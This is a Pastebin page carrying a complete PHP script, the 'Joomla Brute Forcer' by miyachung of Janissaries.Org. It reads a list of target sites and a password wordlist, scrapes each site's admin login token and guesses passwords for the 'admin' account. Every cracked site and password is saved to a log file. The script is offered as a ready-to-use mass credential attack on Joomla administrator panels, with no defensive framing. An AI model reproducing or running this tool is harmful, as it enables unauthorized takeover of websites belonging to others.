YeiZeta

Panel Brute Force Joomla

Oct 2nd, 2012
1,074
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.74 KB | None | 0 0
  1. <?php
  2. set_time_limit(0);
  3. /*
  4. * Joomla Brute Forcer
  5. * Coded by miyachung
  6. * Janissaries.Org
  7. * Special Thanks burtay
  8. * Usage-> php Bruter.php SITELIST PASSWORDS
  9. * Example-> php Bruter.php SITES.txt PASSWORDS.txt
  10. */
  11.  
  12.  
  13. class jom
  14. {
  15.  
  16. public $sites;
  17. public $wordlist;
  18. private $user = "admin";
  19. private $regex = "/([0-9a-f]{32})/si";
  20. private $timeout = 7;
  21. private $cookie_file = "cookie.jani";
  22. private $log_file = "cracks.txt";
  23.  
  24. private function save_File($content)
  25. {
  26. $fp = fopen($this->log_file,'ab');
  27. fwrite($fp,$content);
  28. fclose($fp);
  29. if($fp)
  30. {
  31. return true;
  32. }
  33. else
  34. {
  35. return false;
  36. }
  37. }
  38. private function get_Hash($site)
  39. {
  40. $curl = curl_init();
  41. curl_setopt($curl,CURLOPT_RETURNTRANSFER,TRUE);
  42. curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
  43. curl_setopt($curl,CURLOPT_COOKIEJAR,$this->cookie_file);
  44. curl_setopt($curl,CURLOPT_TIMEOUT,$this->timeout);
  45. $play = curl_exec($curl);
  46. curl_close($curl);
  47. if(preg_match('#value="com_login"#si',$play))
  48. {
  49. preg_match($this->regex,$play,$hash);
  50. return $hash[1];
  51. }
  52. else
  53. {
  54. echo "[-]Hash not found,passing site\n";
  55. return false;
  56. }
  57. }
  58. private function tryPassword($site,$password,$hash)
  59. {
  60. $curl = curl_init();
  61. curl_setopt($curl,CURLOPT_RETURNTRANSFER,TRUE);
  62. curl_setopt($curl,CURLOPT_POST,TRUE);
  63. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,TRUE);
  64. curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
  65. curl_setopt($curl,CURLOPT_COOKIEFILE,$this->cookie_file);
  66. curl_setopt($curl,CURLOPT_TIMEOUT,$this->timeout);
  67. curl_setopt($curl,CURLOPT_POSTFIELDS,"username=".$this->user."&passwd=".$password."&lang=&option=com_login&task=login&".$hash."=1");
  68. $play = curl_exec($curl);
  69. curl_close($curl);
  70. return $play;
  71. }
  72. public function bruter()
  73. {
  74. $sites = explode("\n",file_get_contents($this->sites));
  75.  
  76. foreach($sites as $site)
  77. {
  78. if(!preg_match('#http#si',$site)) $site = "http://".$site;
  79. $site = trim($site);
  80. echo "\n[+]$site\n";
  81. $hash = $this->get_Hash($site);
  82. if(!$hash){continue;}
  83. echo "[+]$hash\n";
  84.  
  85. $wordlist = explode("\n",file_get_contents($this->wordlist));
  86. foreach($wordlist as $password)
  87. {
  88. $try = $this->tryPassword($site,trim($password),$hash);
  89. if(preg_match("/com_config/si",$try))
  90. {
  91. echo "\n\t[*]Password cracked-> ".$password."\n";
  92. echo "\t[*]Saved to the log file\n";
  93. $this->save_File("$site|$password\r\n");
  94. break;
  95. }
  96.  
  97. }
  98. }
  99. }
  100. }
  101.  
  102. if(!$argv[1] || !$argv[2])
  103. {
  104. echo "################################################\n";
  105. echo "\t\tJoomla Brute Forcer\n";
  106. echo "\t\tCoded By miyachung\n";
  107. echo "\t\tJanissaries.Org\n";
  108. echo "################################################\n";
  109. echo "\n[-]Missing arguments\n";
  110. exit;
  111. }
  112. elseif(!file_exists($argv[1]) OR !file_exists($argv[2]))
  113. {
  114. echo "################################################\n";
  115. echo "\t\tJoomla Brute Forcer\n";
  116. echo "\t\tCoded By miyachung\n";
  117. echo "\t\tJanissaries.Org\n";
  118. echo "################################################\n";
  119. echo "\n[-]File not found\n";
  120. exit;
  121. }
  122. else
  123. {
  124. echo "################################################\n";
  125. echo "\t\tJoomla Brute Forcer\n";
  126. echo "\t\tCoded By miyachung\n";
  127. echo "\t\tJanissaries.Org\n";
  128. echo "################################################\n";
  129.  
  130. $jom = new jom;
  131. $jom->sites = $argv[1];
  132. $jom->wordlist = $argv[2];
  133. $jom->bruter();
  134. }
  135.  
  136. ?>
Advertisement
Add Comment
Please, Sign In to add comment